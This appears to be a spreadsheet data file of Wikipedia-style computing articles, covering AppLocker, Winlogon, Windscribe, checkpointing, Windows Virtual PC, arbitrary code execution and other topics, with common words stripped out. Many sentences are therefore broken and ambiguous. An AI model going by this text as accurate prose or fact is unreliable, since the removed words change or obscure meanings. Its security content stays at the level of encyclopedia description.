linux. also selinux linux intrusion detection system (lids) systrace references external links "apparmor wiki". gitlab. retrieved 2018-04-25. apparmor wiki (archived) apparmor description opensuse.org "apparmor detailed documentation". archlinux. retrieved 2018-04-25. lkml thread containing comments criticism apparmor apparmor packages ubuntu counterpoint: (subscription required) novell security experts face apparmor selinux apparmor application security linux</t>
  </si>
  <si>
    <t>AppLocker</t>
  </si>
  <si>
    <t>applocker application whitelisting technology introduced microsoft's windows operating system. allows restricting programs users execute based program's path, publisher, hash, enterprise configured group policy. summary windows applocker allows administrators control executable files denied allowed execute. with applocker, administrators able create rules based file names, publishers file location allow certain files execute. unlike earlier software restriction policies, originally available windows windows server 2003, applocker rules apply individuals groups. policies used group users different enforcement levels. example, users added 'audit' policy allow administrators rule violations moving user higher enforcement level. applocker availability charts bypass techniques there several generic techniques bypassing applocker: writing unapproved program whitelisted location. using whitelisted program delegate launch unapproved program. hijacking dlls loaded trusted application untrusted directory. references</t>
  </si>
  <si>
    <t>Winlogon</t>
  </si>
  <si>
    <t>computing, winlogon (windows logon) component microsoft windows operating systems responsible handling secure attention sequence, loading user profile logon, optionally locking computer screensaver running (requiring another authentication step). actual obtainment verification user credentials left components. winlogon common target several threats could modify function memory usage. increased memory usage process might indicate "hijacked". windows vista later operating systems, winlogon's roles responsibilities changed significantly. overview winlogon handles interface functions independent authentication policy. creates desktops window station, implements time-out operations, versions windows prior windows vista, provides support functions gina takes responsibility configuring machine user group policy. winlogon also checks copy windows legitimate license starting windows later. winlogon following responsibilities: window station desktop protectionwinlogon sets protection window station corresponding desktops ensure properly accessible. general, means local system full access objects interactively logged-on user read access window station object full access application desktop object.standard recognitionwinlogon special hooks user32 server allow monitor control-alt-delete secure attention sequence (sas) events. winlogon makes event information available ginas sas, part sas. general, ginas monitor sass own; however, gina standard ctrl+alt+del sass recognizes winlogon support provided purpose.sas routine dispatchingwhen winlogon encounters event delivered winlogon gina, winlogon sets state accordingly, changes winlogon desktop, calls processing functions gina.user profile loadingwhen users user profiles loaded registry. way, processes user special registry hkey_current_user. winlogon automatically successful logon activation shell newly logged-on user.assignment security user shellwhen user logs gina responsible creating initial processes user. winlogon provides support function gina apply security newly logged-on user processes. however, preferred gina call windows function createprocessasuser, system provide service.screen saver controlwinlogon monitors keyboard mouse activity determine activate screen savers. after screen saver activated, winlogon continues monitor keyboard mouse activity determine terminate screen saver. screen saver marked secure, winlogon treats workstation locked. when mouse keyboard activity, winlogon invokes wlxdisplaylockednotice function gina locked workstation behavior resumes. screen saver secure, keyboard mouse activity terminates screen saver without notification gina.multiple network provider supportmultiple networks installed windows system included authentication process password-updating operations. this inclusion lets additional networks gather identification authentication information normal logon, using secure desktop winlogon. some parameters required winlogon services available ginas explicitly support additional network providers. also list microsoft windows components architecture windows operating system line vundo, trojan attaches winlogon.exe getty, similar process unix windows source code leak september 2020, winlogon piece missing source code, rendering leaked operating system incomplete. references external links customizing gina part developer tutorial writing custom gina customizing gina part developer tutorial writing custom gina mskb:193361 msgina.dll reset winlogon structure windows vista windows server 2008: understanding, enhancing extending security end-to-end microsoft powerpoint presentation includes information changes winlogon windows vista windows server 2008</t>
  </si>
  <si>
    <t>Windscribe</t>
  </si>
  <si>
    <t>windscribe commercial service provider applications windows, macos, linux, android, support routers platforms custom configurations. windscribe based canada. history windscribe founded yegor alex paguis 2016. windscribe's goal "aim develop easy powerful tools allow anyone circumvent censorship", giving help need jurisdictions high levels internet censorship increase online privacy.windscribe launched open beta april 2016, launched fully april 2016.on october 2018, windscribe released transparency report detailed number requests receive copyright enforcement agencies.in january 2021, windscribe began beta testing controld, standalone dns-based tracker service, direct competitor services nextdns.on november 2021, windscribe open-sourced desktop applications, plans open-source remaining applications 2021. features windscribe uses industry-standard virtual private network protocols encrypt route user's connection servers. windscribe uses openvpn, internet exchange v2/ipsec, wireguard protocols applications manual configurations. windscribe servers support file sharing promoted no-log service privacy policy.windscribe desktop applications windows macos, command-line utility linux, mobile applications ios, android, android windscribe also offers encrypted proxy support browser extensions google chrome firefox browsers. windscribe users connect unlimited simultaneous devices.in november 2018, windscribe introduced r.o.b.e.r.t, customizable dns-based tracker blocker.in october 2019, windscribe released browser extensions chrome firefox.in july 2020, windscribe added support wireguard protocol.on april 2021, windscribe released versions desktop application included split tunneling, wireguard support, native support custom configurations support providers windscribe client. 2021 server seizure incident july 2021, windscribe disclosed servers hosted ukraine seized local authorities june 2021. disk servers contained openvpn private key, could used impersonate windscribe server capture traffic running windscribe failed encrypt servers question, allowing retrieval private key. addition, windscribe servers openvpn feature deprecated since 2018, leaving servers unencrypted users vulnerable. also comparison virtual private network services encryption internet privacy secure communication virtual private network references external links official website</t>
  </si>
  <si>
    <t>Apple Software Restore</t>
  </si>
  <si>
    <t>apple software restore command line utility used apply disk image selected partition mount point file system. often used cloning large numbers macintosh computers. apple software restore read image locally server http multicast asr:// uri. methods restore image volume: either copy items file-by-file mode, directly block-copy image. latter method need filesystem, much faster, typically limited speed drives network connections involved. order faster method .dmg file involved must first checksummed, cases files re-ordered inside image. this also done tool. graphical disk utility uses processes background perform restores. also disk cloning list disk cloning software references</t>
  </si>
  <si>
    <t>Application checkpointing</t>
  </si>
  <si>
    <t>checkpointing technique provides fault tolerance computing systems. basically consists saving snapshot application's state, applications restart point case failure. this particularly important long running applications executed failure-prone computing systems. checkpointing distributed systems distributed computing environment, checkpointing technique helps tolerate failures otherwise would force long-running application restart beginning. basic implement checkpointing, stop application, copy required data memory reliable storage (e.g., parallel file system) continue execution. case failure, application restarts, need start scratch. rather, read latest state ("the checkpoint") stable storage execute that. while ongoing debate whether checkpointing dominating workload distributed computing systems, general consensus checkpointing major workloads.there main approaches checkpointing distributed computing systems: coordinated checkpointing uncoordinated checkpointing. coordinated checkpointing approach, processes must ensure checkpoints consistent. this usually achieved kind two-phase commit protocol algorithm. uncoordinated checkpointing, process checkpoints state independently. must stressed simply forcing processes checkpoint state fixed time intervals sufficient ensure global consistency. need establishing consistent state (i.e., missing messages duplicated messages) force processes roll back checkpoints, turn cause processes roll back even earlier checkpoints, extreme case mean consistent state found initial state (the so-called domino effect). implementations applications save state original common means application checkpointing "save state" feature interactive applications, user application could save state variables data storage medium time using either continue working, exit application later time, restart application restore saved state. this implemented "save" command menu option application. many cases became standard practice user unsaved work exiting application wanted save work this sort functionality became extremely important usability applications particular work could completed sitting (such playing video game expected take dozens hours, writing book long document amounting hundreds thousands pages) work done long period time data entry document rows spreadsheet. problem save state requires operator program request save. non-interactive programs, including automated batch processed workloads, ability checkpoint applications also automated. checkpoint/restart batch applications began handle tens hundreds thousands transactions, transaction might process record file several different files, need application restartable point without need rerun entire scratch became imperative. thus "checkpoint/restart" capability born, number transactions processed, "snapshot" "checkpoint" state application could taken. application failed next checkpoint, could restarted giving checkpoint information last place transaction file transaction successfully completed. application could restart point. checkpointing tends expensive, generally done every record, reasonable compromise cost checkpoint value computer time needed reprocess batch records. thus number records processed checkpoint might range 200, depending cost factors, relative complexity application resources needed successfully restart application. fault tolerance interface (fti) library aims provide computational scientists easy perform checkpoint/restart scalable fashion. leverages local storage plus multiple replications erasures techniques provide several levels reliability performance. provides application-level checkpointing allows users select data needs protected, order improve efficiency avoid space, time energy waste. offers direct data interface users need deal files and/or directory names. metadata managed transparent fashion user. desired, users dedicate process node overlap fault tolerance workload scientific computation, post-checkpoint tasks executed asynchronously. berkeley checkpoint/restart (blcr) future technologies group lawrence national laboratories developing hybrid kernel/user implementation checkpoint/restart called blcr. their goal provide robust, production quality implementation checkpoints wide range applications, without requiring changes made application code. blcr focuses checkpointing parallel applications communicate mpi, compatibility software suite produced scidac scalable systems software isic. work broken main areas: checkpoint/restart linux (cr), checkpointable libraries, resource management interface checkpoint/restart development process management interfaces. dmtcp dmtcp (distributed multithreaded checkpointing) tool transparently checkpointing state arbitrary group programs spread across many machines connected sockets. modify user's program operating system. among applications supported dmtcp open mpi, python, perl, many programming languages shell scripting languages. with tightvnc, also checkpoint restart window applications, long extensions (e.g. opengl video). among linux features supported dmtcp open file descriptors, pipes, sockets, signal handlers, process thread virtualization (ensure pids tids continue work upon restart), ptys, fifos, process group ids, session ids, terminal attributes, mmap/mprotect (including mmap-based shared memory). dmtcp supports ofed infiniband experimental basis. collaborative checkpointing some recent protocols perform collaborative checkpointing storing fragments checkpoint nearby nodes. this helpful avoids cost storing parallel file system (which often becomes bottleneck large-scale systems) uses storage closer. this found particularly large-scale supercomputing clusters. challenge ensure checkpoint needed recovering failure, nearby nodes fragments checkpoints available. docker docker underlying technology contain checkpoint restore mechanism. criu criu user space checkpoint library. implementation embedded asic devices mementos mementos software system transforms general-purpose tasks interruptible programs platforms frequent interruptions power outages. designed batteryless embedded devices rfid tags smart cards rely harvesting energy ambient background sources. mementos frequently senses available energy system decides whether checkpoint program impending power loss versus continuing computation. checkpointing, data stored non-volatile memory. when energy becomes sufficient reboot, data retrieved non-volatile memory program continues stored state. mementos implemented msp430 family microcontrollers. mementos named christopher nolan's memento. idetic idetic automatic tools helps application-specific integrated circuit (asic) developers automatically embed checkpoints designs. targets high-level synthesis tools adds checkpoints register-transfer level (verilog code). uses dynamic programming approach locate overhead points state machine design. since checkpointing hardware level involves sending data dependent registers non-volatile memory, optimum points required minimum number registers store. idetic deployed evaluated energy harvesting rfid device. also process image references further reading yibei ling, xiaola lin: variational calculus approach optimal checkpoint placement. ieee trans. computers 50(7): 699-708 (2001) r.e. ahmed, r.c. frazier, p.n. marinos, cache-aided rollback error recovery (carer) algorithms shared-memory multiprocessor systems", ieee 20th international symposium fault-tolerant computing (ftcs-20), newcastle upon tyne, june 26–28, 1990, 82–88. external links libckpt berkeley checkpoint/restart (blcr) distributed multithreaded checkpointing (dmtcp) openvz criu cryopid2</t>
  </si>
  <si>
    <t>Application protocol-based intrusion detection system</t>
  </si>
  <si>
    <t>application protocol-based intrusion detection system (apids) intrusion detection system focuses monitoring analysis specific application protocol protocols computing system. overview apids monitor dynamic behavior state protocol typically consist system agent would typically process, group servers, monitoring analyzing application protocol connected devices. typical place apids would server database management system, monitoring protocol specific middleware/business logic interacts database. monitoring dynamic behavior basic level apids would look for, enforce, correct (legal) protocol. however advanced level apids learn, taught even reduce often infinite protocol set, acceptable understanding subset application protocol used application monitored/protected. thus, apids, correctly configured, allow application "fingerprinted", thus application subverted changed, fingerprint change. also intrusion detection system (ids) application firewall (waf)</t>
  </si>
  <si>
    <t>Application virtualization</t>
  </si>
  <si>
    <t>application virtualization software technology encapsulates computer programs underlying operating system executed. fully virtualized application installed traditional sense, although still executed were. application behaves runtime like directly interfacing original operating system resources managed isolated sandboxed varying degrees. context, term "virtualization" refers artifact encapsulated (application), quite different meaning hardware virtualization, refers artifact abstracted (physical hardware). description full application virtualization requires virtualization layer. application virtualization layers replace part runtime environment normally provided operating system. layer intercepts disk operations virtualized applications transparently redirects virtualized location, often single file. application remains unaware accesses virtual resource instead physical one. since application working file instead many files spread throughout system, becomes easy application different computer previously incompatible applications side side. examples technology windows platform include: benefits application virtualization allows applications environments suit native application. example, wine allows microsoft windows applications linux. application virtualization reduces system integration administration costs maintaining common software baseline across multiple diverse computers organization. lesser integration protects operating system applications poorly written buggy code. cases, provides memory protection, ide-style debugging features even applications written correctly, example applications store user data read-only system-owned location. (this feature assists implementation principle least privilege removing requirement end-users administrative privileges order poorly written applications.) allows incompatible applications side side, time minimal regression testing another. isolating applications operating system security benefits well, exposure virtualized application automatically entail exposure entire os.application virtualization also enables simplified operating system migrations. applications transferred removable media computers without need installing them, becoming portable software.application virtualization uses fewer resources separate virtual machine. limitations computer programs virtualized. some examples include applications require device driver form integration 16-bit applications need shared memory space. anti-virus programs applications require heavy integration, windowblinds stylexp difficult virtualize. moreover, software licensing, application virtualization bears great licensing pitfalls mainly application virtualization software virtualized applications must correctly licensed.while application virtualization address file registry-level compatibility issues legacy applications newer operating systems, applications manage heap correctly execute windows vista still allocate memory way, regardless whether virtualized. reason, specialist application compatibility fixes (shims) still needed, even application virtualized.functional discrepancies within multicompatibility model additional limitation, utility-driven access points shared within public network. these limitations overcome designating system level share point driver. related technologies technology categories fall application virtualization include: application streaming. pieces application's code, data, settings delivered they're first needed, instead entire application delivered startup. running packaged application require installation lightweight client application. packages usually delivered protocol http, cifs rtsp. remote desktop services (formerly called terminal services) server-based computing/presentation virtualization component microsoft windows allows user access applications data hosted remote computer network. remote desktop services sessions single shared-server operating system (e.g. windows server 2008 later) accessed using remote desktop protocol. desktop virtualization software technologies improve portability, manageability compatibility personal computer's desktop environment separating part desktop environment associated applications physical client device used access common implementation approach host multiple desktop operating system instances server hardware platform running hypervisor. this generally referred "virtual desktop infrastructure" (vdi). also workspace virtualization operating-system-level virtualization ("containerization") portable application creators comparison application virtual machines shim (computing) virtual application references</t>
  </si>
  <si>
    <t>Application-Layer Protocol Negotiation</t>
  </si>
  <si>
    <t>application-layer protocol negotiation (alpn) transport layer security (tls) extension allows application layer negotiate protocol performed secure connection manner avoids additional round trips independent application-layer protocols. used establish http/2 connections without additional round trips (client server communicate ports previously assigned https http/1.1 upgrade http/2 continue http/1.1 without closing initial connection). support alpn supported libraries: gnutls since version 3.2.0 released 2013 matrixssl since version 3.7.1 released december 2014 network security services since version 3.15.5 released april 2014 openssl since version 1.0.2 released january 2015 libressl since version 2.1.3 released january 2015 mbed (previously polarssl) since version 1.3.6 released april 2014 since original public release june 2015. wolfssl (formerly cyassl) since version 3.7.0 released october 2015 standard library crypto/tls package) since version released december 2014 jsse java since released september 2017, backported released april 2020 win32 sspi since windows windows server 2012 released october 2013 history next protocol negotiation january 2010, google introduced ietf standard draft describing next protocol negotiation extension. this extension used negotiate experimental spdy connections google chrome google's servers. spdy evolved, replaced alpn. application-layer protocol negotiation july 2014, alpn published 7301. alpn replaces next protocol negotiation (npn) extension.tls false start disabled google chrome version (2012) onward except websites earlier extension. example alpn extension sent initial handshake 'client hello', lists protocols client (for example browser) supports: handshake type: client hello length: version: (0x0303) random: dd67b5943e5efd0740519f38071008b59efbd68ab3114587... session length: cipher suites length: cipher suites suites) compression methods length: compression methods method) extensions length: [other extensions omitted] extension: application_layer_protocol_negotiation (len=14) type: application_layer_protocol_negotiation (16) length: alpn extension length: alpn protocol alpn string length: alpn next protocol: alpn string length: alpn next protocol: http/1.1 resulting 'server hello' server also contain alpn extension, confirms protocol used http request: handshake type: server hello length: version: (0x0303) random: 44e447964d7e8a7d3b404c4748423f02345241dcc9c7e332... session length: session 7667476d1d698d0a90caa1d9a449be814b89a0b52f470e2d... cipher suite: tls_ecdhe_rsa_with_aes_128_gcm_sha256 (0xc02f) compression method: null extensions length: [other extensions omitted] extension: application_layer_protocol_negotiation (len=5) type: application_layer_protocol_negotiation (16) length: alpn extension length: alpn protocol alpn string length: alpn next protocol: references external links registry alpn protocol maintained iana extension. draft-agl-tls-nextprotoneg-04 (npn draft) (last updated: 2012) 7301 "transport layer security (tls) application-layer protocol negotiation extension"</t>
  </si>
  <si>
    <t>Application-level gateway</t>
  </si>
  <si>
    <t>application-level gateway (alg, also known application layer gateway, application gateway, application proxy, application-level proxy) security component augments firewall employed computer network. allows customized traversal filters plugged gateway support address port translation certain application layer "control/data" protocols ftp, bittorrent, sip, rtsp, file transfer applications. order protocols work firewall, either application know address/port number combination allows incoming packets, monitor control traffic open port mappings (firewall pinholes) dynamically required. legitimate application data thus passed security checks firewall would otherwise restricted traffic meeting limited filter criteria. functions offer following functions: allowing client applications dynamic ephemeral tcp/udp ports communicate known ports used server applications, even though firewall configuration allow limited number known ports. absence alg, either ports would blocked network administrator would need explicitly open large number ports firewall rendering network vulnerable attacks ports. converting network layer address information found inside application payload addresses acceptable hosts either side firewall/nat. this aspect introduces term 'gateway' alg. recognizing application-specific commands offering granular security controls synchronizing multiple streams/sessions data hosts exchanging data. example, application separate connections passing control commands exchanging data client remote server. during large file transfers, control connection remain idle. prevent control connection getting timed network devices lengthy file transfer completes.deep packet inspection packets handled algs given network makes functionality possible. understands protocol used specific applications supports. instance, session initiation protocol (sip) back-to-back user agent (b2bua), allow firewall traversal sip. firewall traffic terminated responsibility permitting sessions passes instead firewall. solve another major headache: traversal. basically built-in rewrite information within messages hold address bindings session terminates. also handle body messages (which used ubiquitously voip media endpoints), since also contains literal addresses ports must translated. common equipment interfere technologies solve problem, various providers recommend turning off.an similar proxy server, sits client real server, facilitating exchange. there seems industry convention without application configured intercepting messages. proxy, hand, usually needs configured client application. client explicitly aware proxy connects rather real server. microsoft windows application layer gateway service microsoft windows provides support third-party plugins allow network protocols pass windows firewall work behind internet connection sharing. plugins open ports change data embedded packets, ports addresses. windows server 2003 also includes plugin. plugin designed support active sessions engine windows. this, plugin redirects traffic passes destined port (ftp control port) private listening port 3000–5000 range microsoft loopback adapter. plugin monitors/updates traffic control channel plugin plumb port mappings data channels. linux linux kernel's netfilter framework, implements linux, features modules several algs: amanda protocol tftp ipsec h.323 pptp l2tp also session border controller references external links application level gateway (dns_alg)</t>
  </si>
  <si>
    <t>WindowsSCOPE</t>
  </si>
  <si>
    <t>windowsscope memory forensics reverse engineering product windows used acquiring analyzing volatile memory. uses detection reverse engineering rootkits malware. windowsscope supports acquisition analysis windows computers running windows windows acquisition windowsscope supports software-based acquisition well hardware-assisted methods locked unlocked computers. windowsscope add-on hardware memory acquisition uses express direct access system memory. memory snapshots acquired windowsscope stored repository. memory snapshots repository compared track changes system time. analysis windowsscope shows processes, dlls, drivers running computer time memory snapshot well open network sockets, file handles, registry handles. also provides disassembly control-flow graphing executable code. windowsscope live version tool allows analysis performed mobile device. references external links windowsscope site</t>
  </si>
  <si>
    <t>Windows Virtual PC</t>
  </si>
  <si>
    <t>windows virtual (successor microsoft virtual 2007, microsoft virtual 2004, connectix virtual virtualization program microsoft windows. july 2006, microsoft released windows version free charge. august 2006, microsoft announced macintosh version would ported intel-based macintosh computers, effectively discontinuing product powerpc-based macintosh computers would longer manufactured. newest release, windows virtual versions windows earlier windows officially support ms-dos operating systems earlier windows professional guests. older versions, support wider range host guest operating systems, remain available. windows virtual supported windows windows superseded hyper-v.virtual virtualizes standard compatible device associated hardware. supported windows operating systems inside virtual other operating systems linux run, microsoft provide support, drivers (known "virtual machine additions") operating systems. history connectix virtual microsoft virtual 2004, microsoft virtual 2007, windows virtual successive versions software. windows virtual runs windows earlier microsoft versions older versions windows still available support operating systems older windows starting windows microsoft replaced virtual hyper-v. virtual connectix virtual originally developed macintosh application system released connectix june 1997. first version virtual designed windows-based systems, version 4.0, released june 2001. connectix sold versions virtual bundled variety guest operating systems, including windows, os/2, linux. virtualization's importance enterprise users became clear, microsoft took interest sector acquired virtual virtual server (unreleased time) connectix february 2003. virtual requires later processor, running windows windows 2000 linux requires later. virtual first version expandable drive images. virtual requires newer 10.1 later. support, recommended. virtual faster processor required. earlier versions virtual supported following features: (now removed microsoft virtual 2004, 2007, windows virtual pc): older versions virtual (v5.0 earlier) hard disk formatted creating virtual hard disk file. newer versions must partition format virtual hard disk file manually. virtual switch available virtual version earlier allows adding multiple network adapters. older operating systems supported virtual machine additions. older versions virtual macintosh 9.2.2 earlier. support apple system dropped version 3.under agreement connectix, innotek gmbh (makers virtualbox, part oracle) ported version os/2 host. this version also included guest extensions additions) os/2 guests, could windows, os/2 hosts using virtual versions version guest extensions later included microsoft's virtual 2004. microsoft virtual july 2006, microsoft released virtual 2004 windows free charge, version remained paid software. equivalent version mac, version final version virtual mac. 10.2.8 later powerpc proprietary commercial software product.virtual 2007 released windows platform, public beta testing beginning october 2006, production release february 2007. added support hardware virtualization, "undo disks", transfer statistic monitor disk network, viewing virtual machines multiple monitors support windows vista host guest. windows aero interface disabled windows vista guests limitations emulated video hardware; however, aero effects rendered connecting guest remote desktop services aero-enabled windows vista host, provided guest running windows vista business higher edition."undo disks" make possible revert virtual machines' state earlier point storing changes separate .vud file since last save main .vhd file, used experimenting. file acts snapshot. undo disk file (.vud) incrementally stores changes made virtual machine compared main virtual hard disk drive (vhd) image, applied discarded user. deactivated, changes directly written file.on 2008, microsoft released virtual 2007 service pack added support windows windows vista guest host oses, well windows server 2008 standard guest hotfix rollup virtual 2007 sp1, released february 2009, solved networking issues enhanced maximum screen resolution 2048×1920 (32-bit), enabling 16:9 resolutions 1920×1080. security update released july 2009 address elevation privilege vulnerability guest operating systems.microsoft virtual (2004 2007) work windows 64-bit, even 32-bit platforms lack internet connectivity lack driver. this also impacts windows mobile emulators. windows virtual windows virtual entered public beta testing april 2009, released alongside windows unlike predecessors, version supports windows host operating systems. originally required hardware virtualization support march 2010, microsoft released update microsoft virtual allows without hardware support.windows virtual available free charge certain editions windows either pre-installed oems download microsoft website. features features include: support redirection connect peripherals flash drives digital cameras, print guest host printers. however, isochronous transfer mode supported other methods involve simply treating active drive letter flash drive virtual hard drive. seamless application publishing launching windows mode applications directly windows desktop support multithreading multiple virtual machines concurrently, thread improved stability performance smart card redirection smart cards connected host integration windows explorer manage single explorer folder (%userprofile%\virtual machines) removed features virtual machine console replaced integrated virtual machines shell folder. several options console removed restore start, time performance settings, muting sound inactive virtual machines, full-screen resolution related options, configuring host key, mouse capture options settings requiring administrator permissions. official guest support operating systems earlier windows professional drag-and-drop file sharing guest host direct sharing folders host guest operating system (only volumes shared operating systems) ability commit changes undo disks upon turning virtual machines (doing possible virtual machine settings dialog box) ability physical virtual parallel ports user interface controls using virtual floppy disks (virtual floppy disk functionality, however, still supported accessed using script) virtual additions guest operating systems longer supported removed. however, installing virtual machine additions older microsoft virtualization product works guest oses. properties virtual machine, like guest processor, processor features, video mode, video ram, code cache, controller reads writes, ethernet reads writes, video frame rate command line options longer viewed. system requirements system requirements windows virtual computer running windows (all editions except starter) hard disk space virtual windows environment optional: processor supports hardware-assisted virtualization technology amd-v intel-vt, used. before march 2010, processor mandatory. windows mode windows mode (xpm) virtual machine package windows virtual containing pre-installed, licensed copy windows professional service pack guest previously, motherboard host support hardware virtualization, update early 2010 eliminated requirement. pre-installed integration components allow applications running within virtualized environment appear running directly host, sharing native desktop start menu windows well participating file type associations. windows mode applications terminal services session virtualized windows accessed remote desktop protocol client running windows host.applications running windows mode compatibility issues, actually running inside windows virtual machine redirected using windows host. windows mode used 16-bit applications; includes ntvdm, although might impossible 16-bit applications require hardware acceleration, windows virtual hardware acceleration. windows mode available free charge users windows professional, enterprise, ultimate. users editions windows eligible download this restriction apply windows virtual itself. windows mode also vmware player vmware workstation. however, like virtual itself, vmware products import windows mode windows professional, enterprise, ultimate adhere microsoft licensing requirements. emulated environment virtual emulates following environments: intel pentium (32-bit) processor (but virtualizes host processor windows versions) intel 440bx chipset. standard svga vesa graphics card trio video ram, adjustable later versions manually editing virtual machine's settings file). system bios american megatrends (ami). creative labs sound blaster pnp. (when windows vista installed host (main) guest (virtual) operating systems, settings synchronized host audio configuration required.) 21041 (dec 21140 newer versions) ethernet network card. programs using undocumented features hardware, exotic timings, unsupported opcodes work.implementation: macintosh version virtual uses dynamic recompilation translate code used equivalent powerpc code macs. windows version virtual also uses dynamic recompilation, translate kernel mode real mode code user mode code; original user mode virtual 8086 mode code natively. guest call traps used, especially guest extensions, accelerate emulation offer additional features, integration host environment. virtual virtual server encapsulate virtual hard disks virtual hard disk (vhd) file format, microsoft made documentation available open specification promise.earlier versions virtual supported following features: (now removed microsoft virtual 2004, 2007, windows virtual pc): older versions virtual (v5.0 earlier) hard disk formatted creating virtual hard disk file. newer versions must partition format virtual hard disk file manually. virtual switch available virtual version earlier allows adding multiple network adapters. older operating systems supported virtual machine additions. older versions virtual macintosh 9.2.2 earlier. support apple system dropped version virtual machine integration components windows virtual enable guest operating systems running inside virtual machines interact host operating system beyond feasible physical computers, sharing physical hardware components exchanging data. however, integration components must installed guest operating systems. when integration component installed, mean communicating machines (either virtual physical) virtual network interface. even mouse cursor controlled operating system (either real virtual) given time. however, integration components installed guest operating systems, following features automatically activated: mouse cursor sharing: mouse cursor moved freely machines. host-initiated shutdown: virtual machine shut down, restarted standby hibernation functions. time synchronization: virtual machine's clock automatically synchronized host operating system's clock. process responsiveness monitoring: host operating system able detect whether software guest operating system responsive hung. dynamic screen resolution: screen resolution guest operating system changed simply resizing window running. however, configured allow standard resolutions.in addition features described above, guest operating systems also take advantage following integration features administrator activates them: audio sharing: audio played guest operating system brought host operating system played clipboard sharing: contents text, picture everything copied windows clipboard maybe pasted machines. printer sharing: guest operating systems print host operating system's printer. this feature confused file printer sharing emulated network connection. smart card sharing: smart cards connected host operating system accessed guest operating systems. file sharing: windows virtual also share disk partitions disk drives host operating system guest operating systems. this includes mass storage devices connected later.in windows virtual enabling integration features automatically makes virtual machine user account accessible using remote desktop connection. supported host guest operating systems virtual allows multiple guest operating systems virtualized single physical host. although number popular host guest operating systems lack official microsoft support, sometimes few, any, technical obstacles impeding installation. instead, configuration unsupported microsoft's licensing restrictions, decision focus testing support resources elsewhere, especially production legacy product fades.a program manager microsoft's core virtualization team explains official support entails: with release virtual spend significant amount time trying decide (guest) operating system officially supported. while virtual capable running many operating systems, official support operating system means test thoroughly, ship virtual issue exists operating system, provide full support customers encounter problems running operating systems virtual product positioned desktop use, virtual provides official support different operating systems server-oriented counterpart, microsoft virtual server advanced hyper-v. while latter products support range server operating systems, virtual 2007 supports variety host another guest; successor, windows virtual supports none. and, whereas virtual server hyper-v officially supported select linux guests since 2006 2008, respectively, 2009, microsoft release virtual officially supported linux. nonetheless, number linux distributions successfully virtual 2007, used virtual machine additions virtual server (see below). lastly, 64-bit host support introduced virtual 2007, release able virtualize 64-bit guest; microsoft thus reserved functionality hyper-v, runs 64-bit (x64) editions windows server 2008, windows server 2012, windows server 2012 windows server 2016, windows 8/8.1 enterprise, windows pro, enterprise, education. table supported operating systems following table notes, "support" refers official microsoft support, described above. linux guests installing linux-based guest environment virtual possible. redhat suse linux guests supported. linux additions supported microsoft virtual server, additions also work virtual pc.some linux distributions must installed text mode, support microsoft virtual pc's emulated graphics chip. ubuntu 8.10 "intrepid ibex" must installed safemode, require changes. some websites specialize listing operating systems successfully virtual guests, help users avoid issues installing linux distributions operating systems lacking official microsoft support. intel-based support microsoft announced august 2006, virtual would ported intel platform. microsoft stated, "alternative solutions offered apple vendors, combined fully packaged retail copy windows, satisfy need." similar products available announced time parallels desktop vmware fusion. also about microsoft virtualization technologyfeatures windows virtual hard disks windows 365about virtualizationvirtual disk image virtualization comparison platform virtualization software references external links official website virtual blog msdn windows mode, technet</t>
  </si>
  <si>
    <t>Arbitrary code execution</t>
  </si>
  <si>
    <t>computer security, arbitrary code execution (ace) attacker's ability commands code attacker's choice target machine target process. arbitrary code execution vulnerability security flaw software hardware allowing arbitrary code execution. program designed exploit vulnerability called arbitrary code execution exploit. ability trigger arbitrary code execution network (especially wide-area network internet) often referred remote code execution (rce). vulnerability types there number classes vulnerability lead attacker's ability execute arbitrary commands code. example: memory safety vulnerabilities buffer overflows over-reads. deserialization vulnerabilities type confusion vulnerabilities arbitrary code execution methods arbitrary code execution commonly achieved control instruction pointer (such jump branch) running process. instruction pointer points next instruction process executed. control value instruction pointer therefore gives control instruction executed next. order execute arbitrary code, many exploits inject code process (for example sending input gets stored input buffer ram) vulnerability change instruction pointer point injected code. injected code automatically executed. this type attack exploits fact computers (which neumann architecture) make general distinction code data, malicious code camouflaged harmless input data. many newer cpus mechanisms make harder, no-execute bit. combining privilege escalation own, arbitrary code execution exploit give attacker privileges target process vulnerable. example, exploiting flaw browser, attacker could user, performing actions modifying personal computer files accessing banking information, would able perform system-level actions (unless user question also access). work around this, attacker execute arbitrary code target, often attempt privilege escalation exploit order gain additional control. this involve kernel account administrator, system, root. with without enhanced control, exploits potential severe damage turn computer zombie—but privilege escalation helps hiding attack legitimate administrator system. examples retrogaming hobbyists managed find vulnerabilities classic video games allow execute arbitrary code, usually using precise sequence button inputs tool-assisted superplay cause buffer overflow, allowing write protected memory. awesome games done quick 2014, group speedrunning enthusiasts managed code versions games pong snake copy super mario world utilizing buffer overflow write arbitrary code memory. june 2018, security researcher jean-yves avenard mozilla discovered vulnerability windows 10.on 2018, security researcher discovered vulnerability 7-zip file archiver.php subject numerous vulnerabilities.on december 2021, vulnerability called "log4shell" discovered popular logging framework log4j, affecting many services including icloud, minecraft: java edition steam, characterized "the single biggest, critical vulnerability last decade". also bluekeep (security vulnerability) follina (security vulnerability) references</t>
  </si>
  <si>
    <t>Windows Update</t>
  </si>
  <si>
    <t>windows update microsoft service windows windows families operating system, automates downloading installing microsoft windows software updates internet. service delivers software updates windows, well various microsoft antivirus products, including windows defender microsoft security essentials. since inception, microsoft introduced extensions service: microsoft update windows update business. former expands core service include microsoft products, microsoft office microsoft expression studio. latter available business editions windows permits postponing updates receiving updates undergone rigorous testing. service evolved years, client software. decade, primary client component service windows update could internet explorer. starting windows vista, primary client component became windows update agent, integral component operating system. service provides several kinds updates. security updates critical updates mitigate vulnerabilities security exploits microsoft windows. cumulative updates updates bundle multiple updates, previously released updates. cumulative updates introduced windows backported windows windows 8.1. microsoft routinely releases updates second tuesday month (known patch tuesday), provide whenever update urgently required prevent newly discovered prevalent exploit. system administrators configure windows update install critical updates microsoft windows automatically, long computer internet connection. windows windows windows update mandatory, however, software agreement states users stop receiving updates device disconnecting device internet. clients windows update windows update introduced launch windows offered additional desktop themes, games, device driver updates, optional components netmeeting. windows windows retroactively given ability access windows update website download updates designed operating systems, starting release internet explorer initial focus windows update free add-ons technologies windows. security fixes outlook express, internet explorer programs appeared later, access beta versions upcoming microsoft software, e.g. internet explorer fixes windows resolve year 2000 problem distributed using windows update december 1998. microsoft attributed sales success windows part windows update. windows update requires either internet explorer third-party browser supports activex technology. first version app, version send personally-identifiable information microsoft. instead, downloads full list every available update chooses download install. list grew large performance impact processing became concern. arie slob, writing windows-help.net newsletter march 2003, noted size update list exceeded caused delays minute dial-up users. windows 